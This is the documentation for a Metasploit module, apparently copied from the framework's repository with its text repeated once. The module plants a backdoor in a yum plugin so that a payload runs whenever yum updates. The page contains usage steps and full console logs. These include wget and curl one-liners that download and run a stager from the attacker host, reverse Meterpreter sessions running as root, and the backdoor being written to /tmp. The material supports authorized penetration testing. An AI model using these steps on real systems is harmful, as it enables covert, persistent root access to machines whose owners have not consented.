documentation/modules/exploit/linux/persistence/yum_package_manager.md

## Description

This module will run a payload when the package manager is used.
This module modifies a yum plugin to launch a binary of choice.
`grep -F 'enabled=1' /etc/yum/pluginconf.d/`
will show what plugins are currently enabled on the system.

root persmissions are likely required.

Verified on Centos 7.1

## Verification Steps

1. Exploit a box that uses Yum
2. `use exploit/linux/persistence/yum_package_manager`
3. `set SESSION <id>`
4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
5. `exploit`

When the system runs yum update the payload will launch.  You must set handler accordingly.

## Options

### PAYLOAD_NAME

Name of backdoor executable

### PLUGIN

Name of the yum plugin to target

### PluginPath

Plugin path to use default is (`/usr/lib/yum-plugins/`)

## Scenarios

### Tested on Centos 7.1

Initial access vector via web delivery

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545 
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO KOiqZchh --no-check-certificate http://111.111.1.111:8181/l; chmod +x KOiqZchh; ./KOiqZchh& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.2.100
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 192.168.2.100:34470) at 2025-02-16 11:30:09 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/yum_package_manager 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(linux/persistence/yum_package_manager) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/centos) > getuid
Server username: root
(Meterpreter 1)(/home/centos) > sysinfo
Computer     : centos71.localdomain
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/home/centos) > background
[*] Backgrounding session 1...
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > exploit
[*] Command to run on remote host: curl -so ./lgtOaZox http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./lgtOaZox;./lgtOaZox&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/yum_package_manager) > 
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[+] Plugins are enabled!
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53880) at 2025-02-16 11:30:59 -0500
[!] The service is running, but could not be validated. yum installed and plugin found, enabled, and backdoorable
[*] Attempting to modify plugin
[*] Backdoor uploaded to /tmp/7EtplboZD
[+] Backdoor will run on next Yum update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc
```
update yum to persistence module 2025-09-06 13:23:13 -04:00			`## Description`

			`This module will run a payload when the package manager is used.`
			`This module modifies a yum plugin to launch a binary of choice.`
			`grep -F 'enabled=1' /etc/yum/pluginconf.d/`
			`will show what plugins are currently enabled on the system.`

			`root persmissions are likely required.`

			`Verified on Centos 7.1`

			`## Verification Steps`

			`1. Exploit a box that uses Yum`
			2. `use exploit/linux/persistence/yum_package_manager`
			3. `set SESSION <id>`
			4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
			5. `exploit`

			`When the system runs yum update the payload will launch. You must set handler accordingly.`

			`## Options`

			`### PAYLOAD_NAME`

			`Name of backdoor executable`

			`### PLUGIN`

			`Name of the yum plugin to target`

			`### PluginPath`

			Plugin path to use default is (`/usr/lib/yum-plugins/`)

			`## Scenarios`

			`### Tested on Centos 7.1`

			`Initial access vector via web delivery`

			```
			`resource (/root/.msf4/msfconsole.rc)> setg verbose true`
			`verbose => true`
			`resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111`
			`lhost => 111.111.1.111`
			`resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload python/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set srvport 8181`
			`srvport => 8181`
			`resource (/root/.msf4/msfconsole.rc)> set target 7`
			`target => 7`
			`resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set lport 4545`
			`lport => 4545`
			`resource (/root/.msf4/msfconsole.rc)> set URIPATH l`
			`URIPATH => l`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Starting persistent handler(s)...`
			`[*] Started reverse TCP handler on 111.111.1.111:4545`
			`[*] Using URL: http://111.111.1.111:8181/l`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`wget -qO KOiqZchh --no-check-certificate http://111.111.1.111:8181/l; chmod +x KOiqZchh; ./KOiqZchh& disown`
			`[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045380 bytes) to 192.168.2.100`
			`[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 192.168.2.100:34470) at 2025-02-16 11:30:09 -0500`
			`[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/yum_package_manager`
			`[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp`
			`[msf](Jobs:2 Agents:2) exploit(linux/persistence/yum_package_manager) > sessions -i 1`
			`[*] Starting interaction with 1...`
			`(Meterpreter 1)(/home/centos) > getuid`
			`Server username: root`
			`(Meterpreter 1)(/home/centos) > sysinfo`
			`Computer : centos71.localdomain`
			`OS : CentOS 7.9.2009 (Linux 3.10.0-1160.53.1.el7.x86_64)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`(Meterpreter 1)(/home/centos) > background`
			`[*] Backgrounding session 1...`
			```

			`Persistence`

			```
			`[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > set session 1`
			`session => 1`
			`[msf](Jobs:1 Agents:1) exploit(linux/persistence/yum_package_manager) > exploit`
			`[*] Command to run on remote host: curl -so ./lgtOaZox http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./lgtOaZox;./lgtOaZox&`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`
			`[msf](Jobs:2 Agents:1) exploit(linux/persistence/yum_package_manager) >`
			`[*] Fetch handler listening on 111.111.1.111:8080`
			`[*] HTTP server started`
			`[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg`
			`[*] Started reverse TCP handler on 111.111.1.111:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045380 bytes) to 222.222.2.222`
			`[+] Plugins are enabled!`
			`[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53880) at 2025-02-16 11:30:59 -0500`
			`[!] The service is running, but could not be validated. yum installed and plugin found, enabled, and backdoorable`
			`[*] Attempting to modify plugin`
			`[*] Backdoor uploaded to /tmp/7EtplboZD`
			`[+] Backdoor will run on next Yum update`
			`[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/centos71.localdomain_20250216.3101/centos71.localdomain_20250216.3101.rc`
			```